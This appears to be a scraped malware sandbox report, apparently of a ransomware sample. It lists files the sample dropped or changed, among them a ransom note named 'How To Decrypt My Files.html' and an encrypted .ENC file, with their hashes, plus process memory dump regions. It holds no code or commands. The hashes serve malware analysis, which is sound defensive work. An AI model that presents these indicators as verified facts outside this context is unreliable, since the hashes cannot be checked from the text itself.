C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0133db316a9f4513a529c18ed84db129

SHA1
83ce99a0b7592c86214bffb12be4d75247a09eb0

SHA256
03456132d8ff8733bfe3709557c807ed679f424018547c0590a4407b9fe3e31e

SHA512
f3b256437221d639ddf70d16046911c1bb390d459ded0ea1693b677bb21b9162343e0f0b0bbf407c51d40544e3d22f672d64ed28a06028a88f855b0042e8a181

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
65043dab26cf0bd4cd89a11a29663cc5

SHA1
696b2b45836b3132e59988330677ef4bce274fec

SHA256
7580891997ab52974fb0691f97486cdd26bf6e8a5f8023c9622b391950c20ba1

SHA512
4e69cd6b776093e7c0fc0610b757f7e42421f07e27ca6353da85dc8c8f4610636c556e0b6d5e3a25dddf853b95100944a28c231ad398781319c48be506b8ce46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ad94b1740ea69f4b3b185994291c6be6

SHA1
22e3e11334a3e3e00296def08c8e44bf5a7837a7

SHA256
c8f9863217ae17a1378fe227e9e4144f37750d9c1eff62cb4a1a95f62571f2fb

SHA512
b50848fa031a3a6b84d8e3d347491c04344510e0691a8970728d96d29004363401c99012f348fe17a2282dc665c862a6026c1a5c4fdf16e42fdf6e7672f78a6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7fe771311c331747735415293f3a9e5a

SHA1
ea1e969a52ad921f4a9a18bc8648baf6bb4b1ffd

SHA256
d89287529719ede016ae4f95145349abc48172b9ab46d88e7d9bd15488eca96d

SHA512
3a718d1f0a5fe8cdd55f61e4221497298f603fb4ca40270b402b1ab50958452c7fe6571fd78ffa9d0c9e97f07a49234ee3b66ac922691c2df2b588aa1ac32b6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cad613761f88d595fc20e844e9a4be05

SHA1
348fc1bdbace62994f83249838a5be6d2e6952a2

SHA256
501b6fa11607f4ee61ab36fc1712a85f94133a63482a03363e806ce80e60c04a

SHA512
ae8c17909c20e743b7b348ce15c409501bf4de4df27af7e2225b75d69262de18b673bfb7f92b4c628e9692f17dc174e8d4ab67060495f55b11b294de8d58ab29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbalmlbz.ihg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\How To Decrypt My Files.html

Filesize
639B

MD5
d2dbbc3383add4cbd9ba8e1e35872552

SHA1
020abbc821b2fe22c4b2a89d413d382e48770b6f

SHA256
5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be

SHA512
bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

Download Submit
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
06469a74c28d1b5f39999a3a54eb356a

SHA1
b2d5f211b3a4eb53f06e432b5aad81caf90930b3

SHA256
393b36795513f3ab9625b4dcd988cb2b77a0d8e72378c9c632c632c8eaacd9d8

SHA512
071c2d5461ceb9f80d4cf375410ad156a21fcdb8433a445ba020ee2102887c99d1823645d7aef270c4f619f1588a405f6c12bd822e854817a686b5f3c44e33ee

Download Submit
C:\Users\Admin\Windows backup

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/412-192-0x000002649AEF0000-0x000002649AEFC000-memory.dmp

Filesize
48KB

Download
memory/412-15-0x000002649A720000-0x000002649A730000-memory.dmp

Filesize
64KB

Download
memory/412-1-0x00000264FDFE0000-0x00000264FE002000-memory.dmp

Filesize
136KB

Download
memory/412-11-0x00007FFF03390000-0x00007FFF03E51000-memory.dmp

Filesize
10.8MB

Download
memory/412-12-0x00007FFF03390000-0x00007FFF03E51000-memory.dmp

Filesize
10.8MB

Download
memory/412-13-0x00000264FE500000-0x00000264FE544000-memory.dmp

Filesize
272KB

Download
memory/412-190-0x000002649A970000-0x000002649A97C000-memory.dmp

Filesize
48KB

Download
memory/412-0-0x00007FFF03393000-0x00007FFF03395000-memory.dmp

Filesize
8KB

Download
memory/412-31-0x00007FFF03393000-0x00007FFF03395000-memory.dmp

Filesize
8KB

Download
memory/412-35-0x000002649A740000-0x000002649A74C000-memory.dmp

Filesize
48KB

Download
memory/412-34-0x00007FFF03390000-0x00007FFF03E51000-memory.dmp

Filesize
10.8MB

Download
memory/3616-36-0x0000017DA7D60000-0x0000017DA7D70000-memory.dmp

Filesize
64KB

Download
memory/3616-70-0x0000017DB0200000-0x0000017DB0201000-memory.dmp

Filesize
4KB

Download
memory/3616-52-0x0000017DA7E60000-0x0000017DA7E70000-memory.dmp

Filesize
64KB

Download
memory/3616-68-0x0000017DB01D0000-0x0000017DB01D1000-memory.dmp

Filesize
4KB

Download
memory/3616-72-0x0000017DB0310000-0x0000017DB0311000-memory.dmp

Filesize
4KB

Download
memory/3616-71-0x0000017DB0200000-0x0000017DB0201000-memory.dmp

Filesize
4KB

Download
memory/4532-29-0x00000216FF900000-0x00000216FF976000-memory.dmp

Filesize
472KB

Download